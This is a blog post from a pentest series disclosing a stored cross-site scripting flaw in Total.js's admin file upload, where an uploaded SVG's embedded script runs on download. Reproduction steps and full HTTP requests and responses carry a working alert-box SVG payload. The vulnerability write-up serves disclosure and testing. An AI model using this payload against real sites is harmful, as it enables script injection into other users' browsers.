Sunday, 26 October 2025

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description

- It was noted that the applications file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG image upload


Stored Cross-Site Scripting (XSS) via SVG File Upload


Steps to Reproduce:
  1. Login with user and visit "Layouts"
  2. Visit "Files" and click "Upload"
  3. Upload SVG image file with the contents below
  4. The payload would execute upon clicking "Download"


// HTTP POST Request - Uploading SVG Image File

POST /admin/upload/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

------geckoformboundary6f751f7129e99de4fcc52bcce109c72
Content-Disposition: form-data; name="file0"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
------geckoformboundary6f751f7129e99de4fcc52bcce109c72--


// HTTP POST Response - Uploading SVG Image File

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 17:06:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 129

[{"id":"JE6g1R1cx61f","name":"evilsvgfile.svg","type":"image/svg+xml","ext":"svg","size":159,"url":"/download/JE6g1R1cx61f.svg"}]


// HTTP GET Request - Triggering the Payload

GET /download/JE6g1R1cx61f.svg HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]


// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
last-modified: Sun, 26 Oct 2025 17:06:41 GMT
x-size: 159
etag: 858100
content-type: image/svg+xml
Date: Sun, 26 Oct 2025 17:09:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 159

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description - It was noted that the applications file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG im...